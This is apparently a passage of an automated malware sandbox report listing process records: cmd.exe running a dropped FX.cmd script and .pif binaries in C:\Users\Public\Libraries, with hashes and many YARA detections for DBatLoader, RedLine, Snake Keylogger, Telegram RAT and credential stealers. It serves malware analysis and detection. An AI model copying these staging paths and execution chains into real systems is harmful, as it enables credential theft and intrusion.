                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:4
                                                                                                                                                                        Start time:01:53:15
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.1854703375.0000000002276000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:6
                                                                                                                                                                        Start time:01:53:19
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:01:53:19
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:01:53:20
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, ReversingLabs
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:01:53:30
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\Nsltarpn.PIF
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Nsltarpn.PIF"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:12
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:01:53:31
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000001.1967244493.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:01:53:38
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\Nsltarpn.PIF
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\Public\Libraries\Nsltarpn.PIF"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'161'216 bytes
                                                                                                                                                                        MD5 hash:BF9B75ADF866583299DBC8A5FAD66CFC
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:01:53:39
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:175'800 bytes
                                                                                                                                                                        MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000001.2046118520.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000002.3047750977.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
